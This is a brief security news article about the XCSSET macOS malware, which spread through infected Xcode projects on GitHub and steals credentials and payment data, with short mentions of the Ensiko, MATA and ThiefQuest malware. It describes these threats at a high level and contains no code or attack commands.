Recently, an attack campaign involving the new XCSSET malware was observed targeting Mac users by means of a supply chain-like attack.
How does it work?
Researchers at Trend Micro spotted the XCSSET malware family infecting users by executing malicious code through projects in Xcode, the integrated development environment (IDE) used by macOS developers.
- The second stage malware, an AppleScript file called main.scpt, can harvest system information, kill some running processes, steal user credentials from Google, Yandex, Amocrm, SIPmarket, PayPal, and Apple ID, as well as steal credit-card data linked in the Apple Store.
- It can also manipulate the browser results, replace cryptocurrency wallet addresses with their own, and replace a Chrome download link with a link to an older version.
- Attackers were found propagating the malware via Xcode developer projects hosted on GitHub. Attackers had injected malicious code into two of the projects so that any apps built using these projects would be automatically infected with malicious code.
Other malware targeting Mac users
- In early July, a new feature-rich malware dubbed Ensiko was detected, that could lock files on Windows, macOS, and Linux web servers running PHP.
- In mid-July, a multi-platform malware framework called “MATA” was discovered targeting Windows, macOS, and Linux platforms, which was linked to the Lazarus APT group.
- Some new and quickly evolving variants of ThiefQuest malware were seen targeting Mac users between June 29 and July 3, with more than 30,000 samples submitted to VirusTotal.
MacOS has long been considered as a more secure operating system. However, the scenario is changing at a rapid pace. The emergence of XCSSET malware suite provides an indication that attackers are investing their time and efforts to get past the security barriers laid by Apple’s operating system.